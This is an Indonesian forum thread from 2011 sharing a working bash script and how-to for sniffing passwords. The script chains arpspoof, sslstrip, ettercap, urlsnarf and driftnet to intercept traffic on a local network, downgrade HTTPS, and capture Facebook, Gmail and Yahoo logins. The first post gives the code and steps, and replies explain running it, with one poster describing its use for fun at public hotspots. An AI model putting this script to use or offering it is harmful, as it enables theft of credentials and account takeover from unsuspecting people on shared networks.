Thread Closed
[Share] Sniffing password FB dkk dengen script
#1
Hallo rekan2 IBT, mumpung belum ada kerjaan alias masih nganggur dan daripada otak nganggur juga mendingan ane buat tutor sniffing menggunakan script tetapi tutor ini hanya berlaku di BT4 R2 cause sudah dicoba di BT5 ettercapnya bermasalah......

Oke langsung aja bro............

1.Pertama-tama kita copas script dibawah dan buat menjadi executable

Spoiler! :

#!/bin/bash

# Script for sniffing https connections.
# Script use Arpspoof, SSLStrip, Ettercap, Urlsnarf and Driftnet.
# Tested on BT4 R2
# BY gHero,cseven,spudgunman.
# Ver 0.2

# ASCII sniff.sh
echo '
             .__  _____  _____           .__
 ______ ____ |__|/ ____\/ ____\     _____|  |__
/  ___//    \|  \   __\\   __\     /  ___/  |  \
\___ \|   |  \  ||  |   |  |       \___ \|   Y  \
/____  >___|  /__||__|   |__|    /\/____  >___|  /
    \/     \/                   \/     \/     \/
'

echo '1' > /proc/sys/net/ipv4/ip_forward

iptables --flush
sleep 1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000


# Arpspoof
echo -n -e "Would you like to ARP a (T)arget or full (N)etwork? ";
read ARPOP

if [ "$ARPOP" == "T" ] ; then
echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[37;41m'"Client IP address: "; tput sgr0
read IP1
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' -t '$IP1' '$IP2'' &

else

echo
echo -e '\E[30;42m'"<Arpspoof Configuration>"; tput sgr0
echo '------------------------'
echo -n -e '\E[30;47m'"Router's IP address: "; tput sgr0
read IP2

echo -n -e '\E[37;44m'"Enter your Interface for example <eth0 or wlan0>: "; tput sgr0
read INT
xterm -fg green4 -bg grey0 -e 'arpspoof -i '$INT' '$IP2'' &

fi

# SSLSTRIP
xterm -fg green4 -bg grey0 -e 'sslstrip -a -w ssl_log.txt' &

# ETTERCAP
xterm -fg green4 -bg grey0 -e 'ettercap -T -q -i '$INT'' &

# URLSNARF
xterm -fg green4 -bg grey0 -e 'urlsnarf -i '$INT' | grep http > urlsnarf_log.txt' &

# DRIFTNET
driftnet -p -i $INT &


script diatas bukan ane yang buat bro, ane dapat dr forum backtrack.org

2. kalo udah dicopas save as dengan nama bebas terserah agan, kalo ane sih kasih nama file nya "sniff" dan pastikan buat menjadi executeble

3. selanjutnya execute script tadi dengan command
   # ./sniff.sh

4. kalo berhasil akan keluar pertanyaan seperti dibawah ini:
Spoiler! :



5. Tunggu dengan sabar karena kita ga tahu kapan korban akan login ke account FB, Gmail, yahoo dkk. setelah menunggu dengan sabar akhirnya datang eh salah nongol juga tuh password di ettercap
Spoiler! :



mudah kan cara sniffingnya, tapi inget bro jg diacak acak  tuh account orang kan dosa.........

apabila masih ada kekurangan mohon dimaafkan segera karena tujuan ane hanya berbagi.......


CoolCoolCoolCoolCoolCool

#2
bang cara jadiin executable bjimane @@

#3
untuk bikin menjadi executable save dulu file yang tadi dengan "sniff.sh"
lalu cari file sniff td di desktop.

nah untuk membuat executable silahkan lakukan ini
klik kanan sniff.sh >pilih permision > centang box executable > selesai deh

buka terminal ketik command dibawah ini :
# ./sniff.sh

selanjutnya isi deh pertanyaannya.


#4
matur nuhun bang ane nak coba dulu Smile

#5
nice trick bro ..sapa tau bt5 ntar ada revisi untuk penggunaan ettercap...

#6
(07-05-2011, 12:18 PM)micko Wrote: nice trick bro ..sapa tau bt5 ntar ada revisi untuk penggunaan ettercap...

iya nih bro, ane kalo mau pake nih script pas mau iseng aja di hotspot area.
BT5 nanti akan keluar revisi nya menjadi BT 5.1 tapi masih beberapa bulan lagi release dan mudah2an bugs nya udah dibenerin semua, terutama ettercap.Big GrinBig GrinBig Grin

#7
oke dach keren tp tar w oprek lagi buat di BT 5.,,.

SALAM ANAK BARU

#8
ini bukannya sama kaya egghartz by zee eichel?


#9
(07-05-2011, 01:25 PM)devilnay Wrote: ini bukannya sama kaya egghartz by zee eichel?

bukan bro, ane ambil nih script dari forum backtrack.org dan ane juga bukan yang buat tuh script ane hanya nyoba dan berhasil terus ane sharing deh disini biar kebagian semua nih script.

liat aja isi script nya di buat oleh gHero,cseven,spudgunman
CoolCoolCoolCool
CoolCoolCool






#10
owh hhaa iaa mirip bro Big Grin


Thread Closed


Users browsing this thread: 1 Guest(s)